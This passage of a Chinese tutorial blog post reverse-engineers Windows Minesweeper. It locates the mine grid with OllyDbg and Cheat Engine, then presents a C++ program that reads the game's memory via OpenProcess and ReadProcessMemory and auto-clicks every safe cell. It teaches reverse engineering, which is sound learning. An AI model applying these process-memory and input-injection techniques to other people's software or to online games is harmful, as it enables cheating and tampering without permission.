    表示没有源码的情况下获取程序信息,称为竞品分析。假设某个公司对同行的产品很感兴趣,想知道为什么它们的算法比我们的好,然后需要去分析和算法还原,这也是逆向分析的主要应用。最好的竞品分析,是能够将算法完美还原,两个代码再次编译后,除了地址不一样其他都一样(IDA查看)。注意,看懂代码完善程序并换另一种程序语言复现,算学习;而如果直接COPY别人的二进制或二进制序列,这算抄袭。

    在这里插入图片描述



    二.扫雷游戏逆向分析

    1.游戏介绍

    下面通过扫雷游戏进行逆向分析讲解。

    在这里插入图片描述

    此时我们打开一个工具,360会提示危险操作,点击“允许本次操作”即可。

    在这里插入图片描述

    此时就能够判断某个点是不是雷,从而方便我们点击完成扫雷游戏,O(∩_∩)O

    在这里插入图片描述

    接着进行逆向分析。扫雷中肯定有雷区的定义,作为程序员,你会怎么定义有雷或没有雷,或者插个旗子的状态呢?我们会使用一个二维数组来存储。那么,什么时候肯定会访问这个二维数组呢?在绘制整个游戏区、点击方格的时候都会访问。

    在绘制游戏区时,Windows编程有个关键函数,叫做——BeginPaint。BeginPaint函数为指定窗口进行绘图工作的准备,并用将和绘图有关的信息填充到一个PAINTSTRUCT结构中,所以它将是个突破口。



    2.OllyDbg动态分析

    接着我们使用Ollydbg打开,在逆向分析中,动态分析(OD)和静态分析(IDA)非常多,动静结合也是常用的分析手段。

    推荐作者上一个系列的两篇入门文章:

    • 静态分析:程序并未运行,通过分析文件的结构(格式)获取其内部原理。
    • 动态分析:在程序的运行过程中,分析其内部原理。
    • 灰盒分析:既不静态也不调试,通过一堆监控软件(注册表监控、文件监控、进程监控、敏感API监控)在虚拟机中跑程序,再分析恶意软件的大体行为,并形成病毒分析报告。

    至于哪种方法更好?我们需要具体问题具体分析,如果是分析扫雷游戏,因为没有危害可以动态调试分析,但如果是WannaCry蠕虫,你就不能在真机上动态分析。同时,很多安全公司为了及时响应各种安全事件,会把样本自动上传到服务器中,它们每天会收到成千上万的恶意样本,但可能存在某些未知样本只上传部分的原因,比如某个未知样本是个动态链接库,此时没有运行条件,只能进行静态分析或者模拟接口分析。

    在这里插入图片描述

    软件静态分析包括分析文件格式、分析网络协议、分析软件日志、修改存档文件等,下图展示了通过修改文件游戏作弊的示例。

    在这里插入图片描述

    软件动态调试可以用于HH翻译,比如《仙剑奇侠传》。

    在这里插入图片描述


    OllyDbg是一个新的动态追踪工具,将IDA与SoftICE结合起来的思想,Ring 3级调试器,非常容易上手,是当今最为流行的调试解密工具之一。它还支持插件扩展功能,是目前最强大的调试工具之一。OllyDbg打开如下图所示,包括反汇编窗口、寄存器窗口、信息窗口、数据窗口、堆栈窗口。

    • 反汇编窗口:显示被调试程序的反汇编代码,包括地址、HEX数据、反汇编、注释
    • 寄存器窗口:显示当前所选线程的CPU寄存器内容,点击标签可切换显示寄存器的方式
    • 信息窗口:显示反汇编窗口中选中的第一个命令的参数及跳转目标地址、字符等
    • 数据窗口:显示内存或文件的内容,右键菜单可切换显示方式
    • 堆栈窗口:显示当前线程的堆栈

    下图是打开EXE后显示的界面。

    OD常用的快捷键调试方式包括:

    F2
    设置断点,如下图所示的红色位置,程序运行到此处会暂停,再按一次F2键会删除断点。

    F9
    按下这个键运行程序,如果没有设置相应的点,被调试的程序直接开始运行。

    F8
    单步步过,每按一次这个按键,将执行反汇编窗口中的一条指令,遇到CALL等子程序不进入其代码。

    F7
    单步步入,功能通单步步过(F8)类似,区别是遇到CALL等子程序时会进入其中,进入后首先停留在子程序的第一条指令上。如下图进入CALL子程序。

    F4
    运行到选定位置,即运行到光标所在位置处暂停。

    CTRL+F9
    执行到返回,按下此键会执行到一个返回指令时暂停,常用于从系统领空返回到我们调试的程序领空。

    ALT+F9
    执行到用户代码,从系统领空快速返回我们调试的程序领空。


    接着正式分析扫雷程序。

    第一步:启动OllyDbg软件,选择菜单“文件”,打开winmine.exe文件。
    这里我们猜测游戏中存在一个二维数组,当我们显示界面时会访问这个二维数组,并且调用BeginPaint函数来显示界面。所以接下来需要找到调用BeginPain的位置。

    在这里插入图片描述


    第二步:在反汇编窗口右键鼠标,选择“查找”->“当前模块中的名称”。

    在这里插入图片描述

    当我们在键盘上输入“BEGINPAINT”时,能够迅速找到对应的函数。

    在这里插入图片描述


    第三步:点击右键选择“在每个参考上设置断点”。

    在这里插入图片描述

    接着点击下图所示的“B”进行断点设置界面。
    在这里插入图片描述

    双击该断点会进入到反汇编窗口BeginPaint对应位置。

    在这里插入图片描述


    第四步:按下“F9”运行程序,可以看到在BeginPaint和EndPaint之前有一个CALL函数。

    在这里插入图片描述

    选中该行右键“跟随”之后,去到0x01002AC3位置,发现又存在很多个CALL函数。

    在这里插入图片描述

    一种方法是一个一个函数分析,这里使用另一种方法。当我们在使用扫雷时,发现它的界面并没有闪烁,所以怀疑使用了 双缓存技术,这是我们的突破口。双缓存是在缓存中一次性绘制,再把绘制的结果返回在界面上。比如,你要在屏幕上绘制一个圆、正方形、直线,需要调用GDI的显示函数,操作显卡画一个圆,再画一个正方形和直线,它需要访问硬件三次;此时依赖硬件的访问速度,而且如果绘制错误擦除再绘制,需要反复的访问硬件,为了减少硬件操作,我们在内存中把需要绘制的图像准备好,然后一切妥当之后提交给硬件显示。

    PS:当然,为什么是双缓存技术呢?目前的我也无法理解。只有当我们做了大量的逆向分析后,才会养成一定的经验来帮助我们判断。任何行业和技术都是这样的,包括作者自己,目前也是一步一个脚印的去学习,去总结,去进步。期待与您前行,加油~


    第五步:继续在反汇编窗口右键鼠标,选择“查找”->“当前模块中的名称”,找到双缓存技术的核心函数BitBlt。
    BitBlt是将内存中的数据提交到显示器上,该函数对指定的源设备环境区域中的像素进行位块(bit_block)转换,以传送到目标设备环境。

    在这里插入图片描述

    点击右键选择“在每个参考上设置断点”,如下图所示,此时绘制了两个断点。

    在这里插入图片描述


    第六步:运行程序去到第二个断点BitBlt位置。

    在这里插入图片描述

    注意,此时显示了两层循环,刚好符合我们二维数组的遍历,按F8单步步过可以动态调试观察其效果。

    在这里插入图片描述


    第七步:在0x01002700位置按下F2取消断点,并在该函数的起始位置0x010026A7设置断点,接下来需要详细分析这个双缓存函数绘制过程。

    在这里插入图片描述

    代码中,ESI首先通过XOR进行清零,然后再加1;接着ESI会调用CMP进行比较,说明ESI是循环变量。接下来“MOV AL, BYTE PTR [EBX+ESI]”表示将EBX和ESI相加赋值给AL,然后AL判断一个值再做其他的,这有点像访问数据,后面的显示特性随着AL做改动,即AL影响后面显示的内容。

    MOV指令是数据传送指令,也是最基本的编程指令,用于将一个数据从源地址传送到目标地址(寄存器间的数据传送本质上也是一样的)。

    在这里插入图片描述


    第八步:下面看看寄存器,其中EBX是基址寄存器,ESI是它的偏移量,猜测这个EBX基址寄存器和关键数据有关。

    在这里插入图片描述

    选择EBX基址寄存器,然后选择“数据窗口中跟随”,显示如下图所示的数据。

    在这里插入图片描述

    数据窗口显示如下,我们发现“0F”出现较多,猜测多的这个可能是空的,少的那个是雷“8F”。

    在这里插入图片描述


    第九步:数据区详细分析。
    我们选择0x010026A7位置,然后按下F2取消断点,然后继续运行程序,此时弹出扫雷主界面。游戏中通常会存在边界(围墙),这里“10”应该是边界位置,而0x01005361则为起始位置。

    在这里插入图片描述

    如果第一个不是雷、第二个不是雷、第三个不是雷,第四个才是雷,我们“0F”是空格,“8F”是雷的猜测则正确。

    在这里插入图片描述

    我们取消0x01002700位置的断点,然后运行程序弹出扫雷界面,根据下面的二维矩阵进行扫雷。

    在这里插入图片描述

    如下图所示,前面3个果然时空格,而第四个则时雷。“8A”是雷,“0F”是空格实锤,而且点过的地方会变成数字,比如“40”、“41”、“42”等。

    在这里插入图片描述


    第十步:写个程序进行扫雷数据区详细分析。
    我们重新运行程序,选择“查找”->“当前模块中的名称”,找到双缓存技术的核心函数BitBlt,然后重新找一下,找到代码位置。如下图所示,EBX就是雷区的起始位置,我们要想办法把它读取出来,再往前“MOV EBX, 01005360”代码看到了EBX的赋值定义。

    在这里插入图片描述

    接着我们输入F7单步调试,执行完0x010026C4赋值语句后,我们在数据窗口中跟随EBX寄存器,显示如下图所示。前面8个均为“0F”表示空格,第9个为雷,再验证一次“01005360位置”,就开始准备写程序了。

    在这里插入图片描述

    验证成功,开始写程序吧!

    在这里插入图片描述


    第十一步:扫雷辅助程序。
    我们编写了这样一个程序,当它开启后,我们鼠标移动到方格,如果是雷它的标题会变成“扫雪(xue)”,然后我们不点击它就可以了。哈哈~

    在这里插入图片描述

    正常是“扫雷”。

    在这里插入图片描述

    雷区显示为“扫雪”。当然你也可以写得更隐蔽些,比如和苹果电话手表建立连接,如果是“雷”让手表震动一下,否则正常。

    在这里插入图片描述


    注意,基本原理知道后,就需要开发解决问题了。对于安全行业来说,不管是做病毒还是研究漏洞利用或游戏防护的,逆向分析都是基础,开发解决问题才是关键。比如,某个病毒样本的行为已经分析清楚了,这个病毒在哪里创建系统文件、修改哪个系统文件、注入到哪个进程、动了哪个注册表等等,逆向分析第一步完成,但更重要的是怎么解决问题,创建注册表就需要删除注册表,修改系统文件就要还原文件。

    我们在网上搜索某些病毒资料时,有些逆向工程师会给出手工修复方案,比如关闭哪个服务、删除哪个隐藏文件、手工清除注册表哪一项等。但是对于安全公司来说,比如360公司,你安全扫描完成之后,不可能弹框提示用户手工修复,而是需要提供自动化方案一键修复,最终结果是需要修改杀毒软件的引擎代码,或者提供专杀工具给用户,这个时候工具需要自动化完成相关操作。

    很多新手会看不起开发,觉得搞逆向、搞网安的是王道,不用学开发,这是不对的。 针对上面的实战,我们就发现逆向是站在开发基础上,反向推导作者是怎么做的,比如扫雷需要思考作者会用什么方式表示雷区,然后怎么用UI体现出来以及调用什么函数实现。所以,逆向分析之前都要教开发类的课程,《数据结构》《操作系统》《计算机组成原理》《编译原理》等课程掌握越深入越好。



    三.扫雷游戏检测工具

    通过第二部分,我们知道以下信息:

    • 扫雷的首地址为0x01005360
    • 显示“0F”表示空格,显示“8F”表示雷
    • 雷区的边界为0x10

    原理是找到雷在内存中的值,只要不是雷值我们把它点击开来。接下来作者再补充一个逆向辅助工具,通过CheatEngine实现雷区检测。

    Cheat Engine又称CE修改器,是一款内存修改编辑工具。你可以通过Cheat Engine软件来修改游戏中的内存数据、人物属性、金币数值等等,功能强大且操作简单,可以为你带来良好的更好的体验游戏。


    1.Cheat Engine确定起始位置

    第一步,打开Cheat Engine软件,点击“选择打开一个程序”按钮,如下图所示。

    在这里插入图片描述

    打开扫雷软件设置为初级。

    在这里插入图片描述


    第二步,选择扫描类型为“未知的初始数值”,选择“数值类型”为字节,然后点击“首次扫描”。

    在这里插入图片描述

    此时显示7,290,880个数据,如下图所示:

    在这里插入图片描述


    第三步,接着我们点击扫雷,然后在“扫描类型”中选择“变动的数值”,点击“再次扫描”,此时返回结果183,169个。最终通过反复的筛选找到首地址。

    在这里插入图片描述

    继续点击扫描,如下图所示。

    在这里插入图片描述


    第四步,如果出现地雷则选择“未变动的数值”,点击“再次扫描”,接着继续新一轮的扫雷游戏。

    在这里插入图片描述

    在这里插入图片描述

    始终以第一个方格的状态为目标进行重复的操作。

    • 开始扫描:设置“未知的初始数值”
    • 扫描第一个格子:设置“变动的值”
    • 继续扫描,结果是雷:设置“未变动的值”
    • 继续扫描,结果非雷:设置“未变动的值”
    • 重新开始:设置“变动的值”
    • 重新开始如果第一个格子和上一次一样,则设置“未变动的值”,否则“变动的值”

    下图展示了最后5个结果,接着继续反复筛选。

    在这里插入图片描述

    最终获取如下图所示的结果,其初始地址为——0x01005361,和前面OD软件分析的一样。

    在这里插入图片描述


    第五步,双击该行移动至底部,然后右键选择“浏览相关内存区域”选项。

    在这里插入图片描述

    显示内容如下图所示,它同样和我们前面OD分析的内容一致。其中“8F”表示雷,“40”表示空格,“41”到“49”表示数字,“10”表示边界,同时“0F”表示隔一行。

    在这里插入图片描述

    如下图所示,成功完成了扫雷游戏,O(∩_∩)O

    在这里插入图片描述

    在这里插入图片描述


    2.Cheat Engine确定边界

    第一步,我们查看扫雷初级的高度是“9”,然后重新打开建立“新的扫描”。

    在这里插入图片描述

    输入数字“9”再点击“首次扫描”,返回7174个结果。

    在这里插入图片描述


    第二步,选择中级难度,对应的高度是“16”,然后重新打开建立“再次扫描”,仅剩4个结果。

    在这里插入图片描述

    在这里插入图片描述


    第三步,选择高级难度,设置高度最高即“24”,然后重新打开建立“再次扫描”

    在这里插入图片描述

    最终剩2个结果,高度可能是:

    • 0x01005338
    • 0x010056A8

    在这里插入图片描述


    第四步,使用同样的方法找到宽度。
    宽度返回两个结果:

    • 0x01005334
    • 0x010056AC

    在这里插入图片描述



    3.C++编写鼠标坐标获取案例

    接下来我们开始编写代码,首先给大家看看鼠标坐标获取的一段代码,我们鼠标通常是(x, y)的形式。

    第一步,创建空项目,名称为“MouseMsg”。

    在这里插入图片描述


    第二步,为该工程添加一个“main.cpp”文件,并且添加启动项。

    在这里插入图片描述

    在这里插入图片描述


    第三步,配置graphics.h文件。
    graphics.h是一个针对Windows的C语言图形库,分为像素函数、直线和线型函数、多边形函数、填充函数等。在学习C++游戏编程时,通常会发现VS中没有”graphics.h”头文件,因此需要配置。

    (1) 先从作者github中下载好所需要的文件,如下所示:

    在这里插入图片描述

    下载完后打开下载好的 Inlcude 文件夹,里面有两个头文件:

    在这里插入图片描述

    (2) 将里面的两个文件进行复制,然后粘贴到VS安装目录的include文件夹中。

    • C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\include

    在这里插入图片描述

    (3) 打开下载好的文件夹中的 lib2015子文件夹,将里面的东西全部选中复制,粘贴到VS2015安装目录的 lib 文件夹中。

    • C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\lib\x86
    • C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\lib\x64

    在这里插入图片描述
    在这里插入图片描述

    (4) 接下来就可以在VS中添加“graphics.h”头文件了,里面有很丰富的绘图函数可供我们使用。

    #include <graphics.h>              // 引用图形库头文件
    #include <conio.h>
    
    int main()
    {
    	initgraph(640, 480);            // 创建绘图窗口,大小为 640x480 像素
    	setlinecolor(RGB(255, 0, 0));   // 设置当前线条颜色
    	setfillcolor(RGB(0, 255, 0));   // 设置当前填充颜色
    	fillcircle(200, 200, 100);      // 画圆,圆心(200, 200),半径 100
    	_getch();                       // 按任意键继续
    	closegraph();                   // 关闭图形环境
    }
    

    在这里插入图片描述


    第四步,编写鼠标事件代码。

    #include <graphics.h>              // 引用图形库头文件
    #include <stdio.h>
    
    int main()
    {	
    	//定义鼠标
    	MOUSEMSG m;
    	//初始化窗口 500宽度 500高度
    	initgraph(500, 500);
    
    	while (1) {
    		//获取鼠标消息
    		m = GetMouseMsg();
    		char buff[256];
    
    		//鼠标左键按下
    		if (m.uMsg == WM_LBUTTONDOWN) {
    			//清空数组
    			memset(buff, 0, 256);
    			sprintf_s(buff, "X坐标:%d, Y坐标:%d", m.x, m.y);
    			MessageBox(NULL, buff, "坐标", MB_OK);
    		}
    	}
    	return 0;
    }
    

    运行前需要设置编码方式为“使用多字节字符集”,否则会报错。

    在这里插入图片描述

    运行结果如下图所示,可以看到鼠标点击会显示对应的坐标位置。

    在这里插入图片描述

    其中GetMouseMsg函数表示获取鼠标消息,通过Spy++可以看到很多Windows系统自带的鼠标操作、键盘操作、消息操作等,同时能获取鼠标是左键或右键按下以及对应坐标。

    在这里插入图片描述



    4.C++编写自动扫雷程序

    接下来是通过C++实现一键扫雷功能,主要是模拟鼠标在雷区的点击操作,并且按下所有非雷区域从而实现一键扫雷。利用的是Windows应用程序的消息机制,通过SendMessage函数向指定窗口发送消息,也就是在获取到扫雷的窗口句柄后,利用这个函数向该窗口发送鼠标按键消息,从而实现模拟鼠标的操作。

    该部分参考ioio_jy老师的文章:逆向工程第007篇:扫雷辅助的研究——0秒实现一键自动扫雷

    第一步,创建一个应用程序名叫“SaoleiHelp”,并添加主函数。

    在这里插入图片描述


    第二步,分析扫雷的区域及坐标定义。
    坐标是基于客户区的左上角,但是这个客户区是怎么定义的呢?
    如下图所示,究竟A点是客户区的左上角,还是说B点才是呢?如果A点为坐标原点,那么第一块雷区的坐标就应为(AC,CE),如果B点为坐标原点,那么第一块雷区的坐标就应为(BD,DE)。经过实际测试,MSDN中所谓的客户区,其实是以B点作为起点的位置,即原点坐标(0,0),而雷区中心即E点的坐标为(16,61),每个雷区小方块的大小为16×16,于是可以知道,这里需要循环计算出雷区每一个小方块的坐标,这个坐标与保存有雷区的二维数组下标紧密相关。

    在这里插入图片描述

    假设这个二维数组是mine[y1][x1],其中y1表示的是雷区有多少行,x1表示雷区的列数,那么每个雷区方块的坐标为:

    x = x1 * 16 + 16;
    y = y1 * 16 + 61;
    

    在获得了坐标以后,就可以通过如下语句来模拟鼠标的点击操作了:

    SendMessage(hWnd, WM_LBUTTONDOWN, MK_LBUTTON, MAKELONG(x, y));
    SendMessage(hWnd, WM_LBUTTONUP, MK_LBUTTON, MAKELONG(x, y));
    

    第三步,分析扫雷游戏的雷区长宽数据。
    结合之前宽度、高度的分析,发现高度位置为0x01005338,宽度位置为0x01005334。我们进一步推断,从0x01005330开始,这里的一行绿色数据包含有0x0A、0x09以及0x09这三个数值,很明显这三个数据正是当前雷区的地雷数量以及宽、高等信息

    • 雷数:0x01005330
    • 宽度:0x01005334
    • 高度:0x01005338

    在这里插入图片描述

    同时,我们上面的逆向分析已经知道雷区分布的信息。

    • “8F”表示地雷
    • “8E”表示旗子
    • “40”表示空格
    • “41”到“49”表示数字
    • “10”表示边界
    • “0F”表示隔一行

    还有一个重要信息是雷区的分布起始地址,即:

    • 0x01005361

    但如果计算含有边界的情况,雷区的分布情况则为:

    • 起始地址:0x01005340
    • 结束地址:0x0100567F

    在这里插入图片描述


    完整代码如下:

    #include <stdio.h>
    #include <windows.h>
    #include <graphics.h>
    
    int main() {
    	DWORD Pid = 0;
    	HANDLE hProcess = 0;
    
    	DWORD result1, result2;
    
    	// 获取扫雷游戏对应的窗口句柄
    	HWND hWnd = FindWindow(NULL, L"扫雷");
    	if (hWnd != 0) {
    		// 获取扫雷进程ID
    		GetWindowThreadProcessId(hWnd, &Pid);
    		// 打开扫雷游戏获取其句柄
    		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
    		if (hProcess == 0) {
    			printf("Open winmine process failed.");
    			return 0;
    		}
    
    		// 存放雷区的起始地址
    		DWORD dwBoomAddr = 0x01005340;
    
    		// 雷区的最大值(包含边界)
    		DWORD dwSize = 832;
    		PBYTE pByte = NULL;
    		pByte = (PBYTE)malloc(dwSize);
    
    		// 读取整个雷区的数据
    		ReadProcessMemory(hProcess, (LPVOID)dwBoomAddr, pByte, dwSize, 0);
    		int i = 0;
    		int j = 0;
    		int n = dwSize;
    
    		// 读取雷区的长和宽
    		DWORD dwInfo = 0x01005330;
    		DWORD dwHeight = 0, dwWidth = 0;
    		ReadProcessMemory(hProcess, (LPVOID)(dwInfo + 4), &dwWidth, sizeof(DWORD), 0);    //宽度
    		ReadProcessMemory(hProcess, (LPVOID)(dwInfo + 8), &dwHeight, sizeof(DWORD), 0);   //高度
    
    		int h = dwHeight;
    		int count = 0;
    
    		// 雷区转换,去掉雷区多余的数据
    		PBYTE pTmpByte = NULL;
    		pTmpByte = (PBYTE)malloc(dwHeight * dwWidth);
    		while (i < dwSize) {
    			//边界判断
    			if (pByte[i] == 0x10 && pByte[i + 1] == 0x10) {
    				i = i + dwWidth + 2;
    				continue;
    			}
    			else if (pByte[i] == 0x10) {
    				for (j = 1; j <= dwWidth; j++) {
    					pTmpByte[count] = pByte[i + j];
    					count++;
    				}
    				i = i + dwWidth + 2;
    				continue;
    				h--;
    				if (h == 0) break;
    			}
    			i++;
    		}
    
    		// 获取雷区方块的坐标,然后模拟鼠标进行点击
    		int x1 = 0, y1 = 0;
    		int x = 0, y = 0;
    		for (i = 0; i < dwHeight * dwWidth; i++) {
    			if (pTmpByte[i] != 0x8F) { //雷
    				x1 = i % dwWidth;
    				y1 = i / dwWidth;
    				x = x1 * 16 + 16;
    				y = y1 * 16 + 61;
    				SendMessage(hWnd, WM_LBUTTONDOWN, MK_LBUTTON, MAKELONG(x, y));   //鼠标按下
    				SendMessage(hWnd, WM_LBUTTONUP, MK_LBUTTON, MAKELONG(x, y));     //鼠标抬起
    			}
    		}
    
    		free(pByte);
    		CloseHandle(hProcess);
    	}
    	else {
    		printf("Get hWnd failed.");
    	}
    	return 0;
    }
    

    运行结果如下图所示,一秒实现扫雷。

    在这里插入图片描述



    四.总结

    写到这里,这篇文章就介绍完毕,希望对您有所帮助,最后进行简单的总结下。

    • 一.什么是逆向分析
      1.逆向工程
      2.逆向分析的典型应用
    • 二.扫雷游戏逆向分析
      1.游戏介绍
      2.OllyDbg动态分析
    • 三.扫雷游戏检测工具
      1.Cheat Engine确定起始位置
      2.Cheat Engine确定边界
      3.C++编写鼠标坐标获取案例
      4.C++编写自动扫雷程序

    学安全一年,认识了很多安全大佬和朋友,希望大家一起进步。这篇文章中如果存在一些不足,还请海涵。作者作为网络安全初学者的慢慢成长路吧!希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享,深知自己很菜,得努力前行。

    在这里插入图片描述

    《珈国情》
    明月千里两相思,
    清风缕缕寄离愁。
    燕归珞珈花已谢,
    情满景逸映深秋。

    2020年8月18新开的“娜璋AI安全之家”,主要围绕Python大数据分析、网络空间安全、人工智能、Web渗透及攻防技术进行讲解,同时分享CCF、SCI、南核北核论文的算法实现。娜璋之家会更加系统,并重构作者的所有文章,从零讲解Python和安全,写了近十年文章,真心想把自己所学所感所做分享出来,还请各位多多指教,真诚邀请您的关注!谢谢。

    (By:娜璋AI之家 2020-12-10 星期四 晚上10点写于武汉)



    参考文献:
    真心推荐大家好好看看这些视频和文章,感恩这些大佬!

    展开全文
  • 安全标志与设备管理

    2011-02-19 14:47:00
    安全标志与设备管理     一、安全标志    正确使用安全警示标志是施工现场安全管理的重要内容。    安全标志是指在操作人员容易产生错误而造成事故的场所,为了确保...
  • 一个实用程序库,很好地捆绑到一个工具箱中,用于一般信息安全开玩笑目的 当前注意事项 安装 编辑 insecurity.conf,并设置 TARBALLZ 和 DATAZ TARBALLZ 必须指向包含来自此链接的内容的目录: DATAZ - 待办事项 ...
  • 通过对有源标签保护的资产价值和潜在威胁的分析,为有源标签界定了合理的评估保证级别及相应的安全保证要求,并通过分析其在物联网应用中可能面临的潜在威胁,导出了有源标签需要满足的安全目的,进一步得出了需要...
  • HTTP安全

    千次阅读 2020-10-24 09:35:09
    正如我们反复指出的, HTTP 的特性让它不容易被居心叵测的人控制,但是同样使得让 http 变得非常安全变得富于挑战性。现在你知道 Web 应用如何优雅的解决了 HTTP 无状态的问题,但是也可想而知还是有一些安全问题...
  • 射频识别即RFID(Radio Frequency IDentification)技术,又称电子标签、无线射频识别,是一种通信技术,可通过无线电讯号识别特定目标并读写相关数据,而无需识别系统与特定目标之间建立机械或光学接触。...
  • 信息安全发展的三个阶段:通信保密,信息安全,信息保障 Wind River的安全专家则针对IoT设备安全提出了如下建议: 安全启动 设备首次开机时,理应采用数字证书对运行的系统和软件作认证; 访问控制 采用不同...
  • (2)网络扫描:利用程序去扫描目标计算机开放的端口等,目的是发现漏洞,为入侵该计算机做准备。 (3)网络入侵:当探测发现对方存在漏洞后,入侵到目标计算机获取信息。 (4)网络后门:成功入侵目标计算机后,...
  • 提出一种细粒度的移动数据安全保护模型,通过在智能终端和移动接入网关/服务器处针对移动数据、移动应用进行标记,对移动数据的操作进行控制,达到移动数据安全隔离的目的,进而实现对移动数据细粒度的安全管理功能...
  • 非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
  • 信息安全第五章 操作系统安全

    千次阅读 2021-11-12 23:27:07
    第5章 操作系统安全 了解操作系统安全的发展历史; 掌握安全操作系统的安全策略与模型; (重点) 掌握安全操作系统的访问控制机制; (重点) 了解安全操作系统的评测方法与准则。 安全操作系统概述 系统安全架构发展...
  • 网络安全协议(一)

    千次阅读 2020-10-02 16:02:12
    容易被窃听和欺骗 脆弱的TCP/IP服务 缺乏安全策略 配置的复杂性 网络中与安全相关的饿协议 实施安全保护的层次 决定到底在堆栈的什么地方应用安全措施时,要依赖于应用(程序)对安全保密的要求,以及用户自己的一些...
  • 总结了矿用产品安全标志认证现场评审和中国强制性产品认证工厂检查的有关管理情况,从评审依据、评审员管理、评审费等方面比对分析了两者的差异性,从而达到相互借鉴的目的
  • 操作系统安全机制

    千次阅读 2018-09-16 23:38:37
    版权声明:本文为博主原创文章,未经博主允许不得转载。...操作系统的安全性表现 物理上分离:要求进程使用不同的物理实体 时间上分离:具有不同安全要求进程在不同时间运行 逻辑上分离:要求进程...
  • 中级软考信息安全工程师笔记

    千次阅读 多人点赞 2021-01-25 16:24:27
    1999年9月13日,由国家公安部提出并组织制定,国家质量技术监督局发布了《计算机信息系统安全保护等级划分准则》,并定于2001年1月1日实施其中把计算机信息安全划分为了5个等级: 第一级:用户自主保护级; 第二级:系统...
  • 数据安全分类分级剖析

    千次阅读 2021-09-15 00:04:46
    数据分类分级对于数据的安全管理至关重要,安全分类分级是一个“硬核课题”,从数据治理开始,除了标准化和价值应用,重要的课题就是质量+安全安全是底线,是价值应用的前提和基础。数据分类可以为数据资产结构化...
  • 网络信息安全的重要性

    万次阅读 2018-08-15 11:39:01
    在互联网普及的初期,人们更关注单纯的连接性,以不受任何限制地建立互联网为最终目的。正如事情都具有两面性,互联网的便捷性给人们带来了负面问题,计算机病毒的侵害、信息泄露、网络欺诈等利用互联网的犯罪行为日...
  • 除此之外,还可以创建一个禁止所有计算机PING本机IP地址的安全策略同样可以达到上述目的。下文所述对WIN 2000比较合适,但限于笔者的机器环境,就以Windows server 2003为平台简述过程: STEP1:添加IP筛选器和筛选器...
  • 华为防火墙安全策略

    千次阅读 2020-12-11 10:48:39
    平时我们上班乘坐地铁,出差乘坐高铁或飞机,在这三个场所中都会有蓝色的标志“Security Check”,旁边站着一个工作人员“安检员”。他的作用就是检查乘客随身携带的物品是否安全,如安全放行通过,如不安全,拒绝...
  • 常见六大Web安全攻防解析

    千次阅读 多人点赞 2019-06-26 12:42:19
    在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?本文主要侧重于分析几种常见的攻击的类型以及防御的方法。 想阅读更多优质原创文章请猛戳...
  • 初识RFID的物理与逻辑安全机制

    千次阅读 2020-04-14 12:00:19
    RFID的安全与隐私保护: 三类威胁: 1.身份隐私威胁,即攻击者能够推导出参与通信的节点的身份 2.位置隐私威胁,即攻击者能够知道一个通信实体的物理位置或粗略地估计出到该实体的相对距离,进而推断出该通信实体的...
  • 代码安全

    千次阅读 2018-07-31 17:53:43
    如何保障系统、网站不会因黑客的恶意攻击而导致系统崩溃、数据泄露等安全问题,解决此问题的最根本的手段还是要回归到代码上面,只有写出的代码是安全的、是无懈可击的、没有任何逻辑漏洞,才能杜绝一切安全问题。...
  • Linux之SELinux-安全上下文

    千次阅读 2018-09-09 16:03:06
    管理文件安全标签 管理端口标签 管理SELinux布尔值开关 设置SELinux管理日志 查看SELinux帮助  *******温馨提示:小编认为文中的理论知识点也很重要,请热爱学习的你们也同样耐心阅读完******** SELinux介绍...
  • 摘 要:无线射频识别(RFID)技术目前己被广泛应用,但其缺乏安全机制,无法有效地保护RFID标签中的数据信息。该文分析了RF1D技术在应用中存在的安全及隐私问题,提出了在RFID标签芯片计算资源有限的情况下解决这些...
  • 信息安全技术(俞承杭)期末复习

    千次阅读 2021-01-15 14:13:08
    第一章 信息安全概述 对于信息的功能特征,它的基本功能在于维持和强化世界的有序性动态性 对于信息的功能特征, 它的社会功能表现为维系社会的生存、 促进人类文明的进步和自身的发展 信息技术主要分为感测与识别...
  • 计算机三级信息安全知识点

    万次阅读 2021-03-26 19:23:04
    信息系统安全可以划分以下四个层次:设备安全,数据安全(三要素),内容安全,行为安全 保护、检测、响应(PDR)策略是确保信息系统和网络系统安全的基本策略 进程与cpu的通信是通过共享存储器系统、消息传递系统、管道...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 218,199
精华内容 87,279
关键字:

安全标志的目的是什么